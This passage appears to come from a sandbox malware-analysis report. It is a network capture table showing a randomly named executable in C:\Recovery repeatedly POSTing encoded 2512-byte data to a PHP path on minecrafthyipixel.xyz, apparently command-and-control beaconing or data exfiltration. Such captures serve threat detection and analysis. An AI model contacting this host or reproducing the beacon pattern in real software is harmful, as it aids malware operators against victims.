                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xlJU1FAd0AUAlm9ixzh1766Hils1zoq0u0nF9m910G6IafbzCwx%2F417zyfXRNF7uB0CQjUlWic%2FBTHuB6VzuM3GEPK0Kptp3Af94OKWgCmWaAMFaaQFGic5Zcz6EzFSX9tUJRTVkyzI%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca22ff91553c2-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
Apr 19, 2024 13:42:51.285490990 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
26 | 192.168.2.4 | 49773 | 104.21.57.61 | 80 | 6756 | C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 13:42:51.514950037 CEST | 386 | OUT | POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
Apr 19, 2024 13:42:51.619503975 CEST | 25 | IN | HTTP/1.1 100 Continue
Apr 19, 2024 13:42:51.619663000 CEST | 2512 | OUT | Data Raw: 57 5e 5e 5f 5c 40 54 54 5c 5e 59 59 57 56 58 5a 54 55 5f 57 54 55 53 5a 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: W^^_\@TT\^YYWVXZTU_WTUSZ^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]%_&.6; Z$;';!V*(?^&932>R#T2) #Z [.$[. X !
Apr 19, 2024 13:42:52.002085924 CEST | 625 | IN | HTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:42:51 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=O9v0CGnspHt9WL5BEspo%2BsamS3vXohQIjApMteAaTIVgN2vdoqTXMm8QZu0Ppf456E%2FrNgqkiX8VuEM%2BnUmL%2FyXFfw7wvA%2FGvyr7%2Fve3HBgUj4Qn36FZvyVb4WVj5OtcG9cFluCP0hg%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca2344e667bdc-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:42:52.002146006 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                    27 | 192.168.2.4 | 49775 | 104.21.57.61 | 80 | 6756 | C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                                    Apr 19, 2024 13:42:52.067475080 CEST | 386 | OUT | POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2192
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Apr 19, 2024 13:42:52.172260046 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:42:52.549895048 CEST | 768 | IN | HTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:42:52 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Wr9OMIC8RY1ZCVJ5sdF2Esj7eernfuntHQ8EWVPnJI5U%2B%2FKufsvB631%2BzyVpb12IXSl7iKYB1yeSH36uEchZPddvjweeQU94IzhkLp4qZPOxneXPT557HCvEKcSNI5wJoms8YSkxyFA%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca237cef0458f-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Apr 19, 2024 13:42:52.549957037 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                    28 | 192.168.2.4 | 49776 | 104.21.57.61 | 80 | 6756 | C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                                    Apr 19, 2024 13:42:52.215842962 CEST | 362 | OUT | POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Apr 19, 2024 13:42:52.320451021 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:42:52.581852913 CEST | 621 | IN | HTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:42:52 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vR7GfzYYszpXZYuNsnRjuD5GXO2q19KEdF7xET%2BjGDsL2R%2FHYhkP2fxADQMAGd%2FQCLwjqLEl3VZ3VjJyYr9QCJlMQlziApEnYc%2FtypHCsoC1LZ3mVT5ciiGtbImFs8WDTSgD2MlXpzQ%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca238ac0dadd8-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:42:52.581913948 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                    29 | 192.168.2.4 | 49777 | 104.21.57.61 | 80 | 6756 | C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                                    Apr 19, 2024 13:42:52.817693949 CEST | 362 | OUT | POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Apr 19, 2024 13:42:52.922379017 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:42:53.190293074 CEST | 619 | IN | HTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:42:53 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6W8WJxcoofq%2BOKGsPPvknUltWOmfyS9wB1gaRXG6xvkPidJdqcskUMhQCZkP4KxnbaVMMbzpm9wp%2FgWLULgIJLZIjy%2BIWF3vvfKYeAbGuhtFcYlBS4KHrtDA1fAhB0IxYtNXUetrj4s%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca23c7ea57bb7-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:42:53.190356970 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                    30 | 192.168.2.4 | 49778 | 104.21.57.61 | 80 | 6756 | C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                                    Apr 19, 2024 13:42:53.420804977 CEST | 386 | OUT | POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Apr 19, 2024 13:42:53.525132895 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:42:53.784233093 CEST | 625 | IN | HTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:42:53 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3Yf9DonMeDS5S%2BhSzvB85M%2FqQr1gj%2FD%2BlWPCwIqunkd0%2F1fOA6VZhKRAcyZDzECENBE6vvUo1s3nv5OSKH6Y3i7V0wirb9gLCuq8KBDLhRhUggOHrkbtXhHgc3o5PVp5Gzq3U9%2BwJjI%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca2403beeb077-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:42:53.784292936 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                    31 | 192.168.2.4 | 49779 | 104.21.57.61 | 80 | 6756 | C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                                    Apr 19, 2024 13:42:54.019906044 CEST | 386 | OUT | POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Apr 19, 2024 13:42:54.124525070 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:42:54.481956005 CEST | 619 | IN | HTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:42:54 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nyo0DokNiAonGRrkdwPcebbaZVC0IoqqWtCW8HPMZ9iCuf54Dhak6OS4FAHInAbZKrNP2YfRbAXKDGeXmMdmP4%2B%2Bc2TxFX7eBrg2t6yawppmqiGalo4afqN%2BY1Pbda3M9CRj4LyxEiE%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca243f980adcc-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:42:54.482053041 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                    32 | 192.168.2.4 | 49780 | 104.21.57.61 | 80 | 6756 | C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                                    Apr 19, 2024 13:42:54.723964930 CEST | 386 | OUT | POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
Apr 19, 2024 13:42:54.828694105 CEST | 25 | IN | HTTP/1.1 100 Continue
Apr 19, 2024 13:42:54.828883886 CEST | 2512 | OUT | Data Raw: 52 58 5b 59 59 45 54 55 5c 5e 59 59 57 56 58 58 54 53 5f 58 54 55 53 5f 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: RX[YYETU\^YYWVXXTS_XTUS_^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]&1>>W"'#?3]-?;;X':?1+2R#"= 4<,[/%$[. X !
Apr 19, 2024 13:42:55.181181908 CEST | 615 | IN | HTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:42:55 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=E9pCoXSfeTYnl6uN3gGrHlYxYJ27ilc5z0G50VQvsW3fP8RVmZ9Eag7hwIqyBRBaN6ovK%2BL9ngFvrCHhexYR69S6baGgIwrWlYNnZlAc3oq9gWK7SO8NNbOoDtKeDRNYzoGeQ3sfUyY%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca2485f8b8bb9-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
Apr 19, 2024 13:42:55.181247950 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
33 | 192.168.2.4 | 49781 | 104.21.57.61 | 80 | 6756 | C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 13:42:55.409945965 CEST | 386 | OUT | POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
Apr 19, 2024 13:42:55.514437914 CEST | 25 | IN | HTTP/1.1 100 Continue
Apr 19, 2024 13:42:55.514724970 CEST | 2512 | OUT | Data Raw: 57 5a 5e 58 5c 41 54 5d 5c 5e 59 59 57 51 58 53 54 57 5f 5a 54 5b 53 5c 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: WZ^X\AT]\^YYWQXSTW_ZT[S\^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]&1"V6;?$37Z0)+Y&9S18>7T6Q=;#.%$[. X =
Apr 19, 2024 13:42:55.864952087 CEST | 619 | IN | HTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:42:55 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YTn3zTZRRBz5J2ab2lGFto4oGNGuVyY1JLdg1m3icR4NzNCjsOd3WIXQtZ994RMZ5kv7uGWAHdc%2Fp79ks3EMwK7c6nVgVLJTf3RBo2u5Bfh%2FrqW%2FFPX8KW6bOqpAnbjCWqtq1XGgDBg%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca24ca89cade3-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
Apr 19, 2024 13:42:55.865014076 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
34 | 192.168.2.4 | 49782 | 104.21.57.61 | 80 | 6756 | C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 13:42:56.092020035 CEST | 386 | OUT | POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
Apr 19, 2024 13:42:56.196677923 CEST | 25 | IN | HTTP/1.1 100 Continue
Apr 19, 2024 13:42:56.199951887 CEST | 2512 | OUT | Data Raw: 57 5c 5e 5c 59 4b 51 5a 5c 5e 59 59 57 5e 58 58 54 52 5f 5a 54 55 53 56 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: W\^\YKQZ\^YYW^XXTR_ZTUSV^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]%_2>>6/' $]!U*82*8W1+%42.V*8<"/?-$[. X
Apr 19, 2024 13:42:56.455543995 CEST | 627 | IN | HTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:42:56 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UYLoXW6ROZ4S%2BxFDw6StggaPOn6D2%2F8sXtdsMrptau%2BGzLd0EU5RHB3jdn5vqTf6NYS1G3PTO%2Bz1MOhlD2%2Fu1YM9gBenyVGaVn%2BruswWKf5Umzpboes12ht60JzKKRinsxWql6s%2FqWI%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca250ee7bad80-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
Apr 19, 2024 13:42:56.455605984 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
35 | 192.168.2.4 | 49783 | 104.21.57.61 | 80 | 6756 | C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 13:42:56.686832905 CEST | 386 | OUT | POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
Apr 19, 2024 13:42:56.791609049 CEST | 25 | IN | HTTP/1.1 100 Continue
Apr 19, 2024 13:42:56.791755915 CEST | 2512 | OUT | Data Raw: 52 58 5e 5e 5c 40 54 59 5c 5e 59 59 57 52 58 5f 54 56 5f 56 54 5b 53 5f 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: RX^^\@TY\^YYWRX_TV_VT[S_^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]&'>W5( \3 00(.=82?2;"P#T2V=\#?.$[. X 1
Apr 19, 2024 13:42:57.060425997 CEST | 617 | IN | HTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:42:57 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kUS43S1Rgf8MzCt7gLqlrqkN%2F5bprBcJ0GhX0J4pUpMVbDkqNnPCYkAjVK0AWcfkbFZDSlbsBlAihwMiTZRY7QaC950bhN5lkNvfuZHbVWZtC7wmaOn8Ooz8hRylMnHKBhPHU%2BQsxPo%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca254abdbb085-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
Apr 19, 2024 13:42:57.060487032 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
36 | 192.168.2.4 | 49784 | 104.21.57.61 | 80 | 6756 | C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 13:42:57.278765917 CEST | 386 | OUT | POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
